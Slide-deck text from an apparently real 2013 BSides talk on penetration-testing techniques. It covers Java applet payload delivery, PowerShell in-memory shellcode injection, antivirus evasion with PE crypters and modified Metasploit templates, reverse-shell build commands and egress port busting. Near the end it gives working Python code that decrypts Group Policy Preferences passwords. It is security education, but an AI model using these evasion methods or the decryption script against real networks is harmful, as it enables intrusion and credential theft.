Embed Size (px)
DESCRIPTION
Secret Pentesting Techniques from bsides las vegas 2013
Citation preview
BSIDES Las Vegas
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant
Email: [email protected] https://www.trustedsec.com
@TrustedSec
Introduc)on • As penetration testers, exploit
writers, huggers, etc. we have secret techniques we always use.
• Although some may or may not be public, they are generally obscure and not well known.
• The purpose of today’s talk is
to show you my secrets.. Some of my techniques that I use that aren’t widely known.
• Why show you? I’m an open book on everything I do and sharing is what it’s all about.
Technique #1 • Java Applet Attack (SET) – Well
known attack method right?
• Do you know how it actually works?
• Do you know the techniques behind it to make it successful?
ZOMG APT • News agencies around the
world discovered a new and extremely advanced zero-day exploit against Java.
• Made me feel kind of special =)
• How people found out it was set?
ILIKEHUGS
DEMO:
Walking through the Attack
Explaining the Applet • Parameters that are
injected into the HTML code are pulled from the Applet.
• Obfuscated and randomized each time.
• Parameters tell the Applet which attacks to use.
Method 1 – Binary Dropper • Binary is downloaded from attacker machine via web server (Java
downloader)
• Obfuscated binary each time per deployment.. Combination of PE manipulation, UPX, and rewriting binary on fly (import pefile)
DEMO:
Binary Dropping Technique
Method 1 – Weak Sauce • Binary’s are easily picked up
by AV if signatures focus on obfuscation techniques. (SET changes them each version)
• Direct interaction with Windows file system and writing to disk.
• Multiple points of evidence on victim machine.
Method 2 – Shellcodeexec • Shellcodeexec method drops a
custom compiled and modified version of shellcodeexec by Bernardo Damele.
• Executable takes int main(int argc, char*argv[]) parameter for alphanumeric shellcode. Uses VirtualAlloc for read, write, and execute memory space.
• Alphanumeric shellcode is executed in memory and payload is delivered.
DEMO:
ShellcodeExec
Method 2 – Easily detectable • Shellcodeexec is a simple yet
awesome method but still has a number of drawbacks.
• Like Method 1 – Binary’s can be picked up unless custom version created. Direct interaction with Windows file system and writing to disk.
• Like Method 1 - Multiple points of evidence on victim machine.
Method 3 – Powershell Injec)on • Detect if Powershell is installed
(installed by default on Vista and Windows 7 and 8).
• Powershell gives us complete flexibility on a number of post exploitation situations.
• Technique discovered by Matthew Graeber (you rock).
Method 3 – PS ShellCode Injec)on • Applet detects if powershell
is installed on system.
• Grabs the operating system type (x86 / x64)
• Deploys Shellcode straight through powershell.
DEMO:
ShellcodeExec
Method 3 – Powershell Injec)on • Never touches disk – AV /
HIPS signatures go out the door.
• Obfuscated each time so that memory inspection is extremely difficult.
• Extremely reliable and stable.
PE Security Evasion
Scenario 1 – Dropping PE’s like its hot • Your using Metasploit – All of
them are being picked up by AV, HIPS, etc.
• Most cases, I will rewrite the exe template for Metasploit to customize binary for evasion.
• Couple cool ways to do this.
Modifying PE For Evasion in MSF • Easiest way for me is to make
a simple program that creates a RWX process then have the program execute Metasploit Shellcode.
• You can also modify the
Metasploit exe.rb template and obfuscate the code that way.
PE Crypters • One of my favorites was
recently released called Hyperion (Christian Ammann from nullsecurity.net).
• Encrypts PE the file using a randomized simple cipher key with AES 128.
• When executable is run, it brute forces the AES key then decrypts the PE file for you.
DEMO: Hyperion
Hyperion Encryp)on • Very cool concept and easy
to use and write one for yourself.
• Ability to have a completely unique PE file each time.
• Slight downfall, stub used for brute force is not polymorphic.
Building a Simple Reverse Shell
The Reverse Shell
• Connects out to the attacker (reverse shell).
Compiling Binaries
• PyInstaller – Compiles python code for you into a binary by wrapping the Python Interpreter into the executable.
• Works on Linux, OSX, and Windows.
python Configure.py python Makespec.py –onefile –noconsole shell.py python Build.py shell/shell.spec cd shell\dist
Making it easy – pybuild.py
• All code and samples will be released on the TrustedSec website soon.
DEMO: Building a Shell
Bypassing AV
Finding your way home
Bumping the Firewall • A number of companies
restrict ports outbound and only allow what’s needed for the business.
• Trouble getting payloads out, especially if you only have one shot.
Egress Bus)ng • Few ways to do it, pre-staged
payload for identifying way out.
• Attempt staged reverse on every port.
• Metasploit has an ALLPORTS payload as well.
Egress Buster 0.2 • Server/Client situation where
victim connects out on every port 1024 ports at a time.
• Server listens for connection and reports back.
• Here’s where you can have some fun.
Egress Buster Reverse Shell
Egress Buster Reverse Shell • Released this week!
• Allows you to bust all ports inside the firewall and spawn a command shell.
• Custom, so no AV picks this up. Byte compiled into an executable.
DEMO:
Egress Buster Reverse Shell
Egress Buster Reverse Shell Usage • Recent Penetration Test – Found
file upload + execute binary’s.
• Could not find a standard port out i.e. 80, 443, 53, 25, etc.
• Wrote this to deploy and found several obscure ports that were allowed.
Fun with Group Policy
One of my PERSONAL Favorites • How many times have we been on a
pentest with just a domain user?
• Need that local administrator account for all of the domain computers?
Research from: Sogeti ESEC Pentest Article: http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
The AZack • Navigate to a domain controller
and hit up the SYSVOL share.
• Head to the domain name and Policies folder.
• Look for a GUID then MACHINE\Preferences\Group.
• Look for the Groups.xml file.
Contents of File
Sta)c Key for AES Anyone?
Python Code # code was developed and created from # http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences from Crypto.Cipher import AES from base64 import b64decode key = """ 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b """.replace(" ","").replace("\n","").decode('hex') cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=") o = AES.new(key, 2).decrypt(cpassword) print o[:-ord(o[-1])].decode('utf16')
Decrypted Password
>>> print o[:-ord(o[-1])].decode('utf16') Local*P4ssword!
Expanding on Group.xml
More Passwords Stored • The folks over at rewt dance (
http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) found a few more areas that store passwords using the cpassword attribute.
• Services, ScheduledTasks, SQL servers and much more are impacted.
List of Other Affected Areas (from rewt dance)
Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13) ScheduledTasks\ScheduledTasks.xml http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13) http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13) http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13) Printers\Printers.xml http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13) Drives\Drives.xml http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13) DataSources\DataSources.xml http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
There’s a ton more of these…
Hopefully can make these a series.
Downloads
For the code and tools used in this presentation, head over to https://www.trustedsec.com and click on the Downloads.
Secret Pentesting Techniques Shhh...
Dave Kennedy Founder, Principal Security Consultant
Email: [email protected] https://www.trustedsec.com
TrustedSec, LLC @TrustedSec
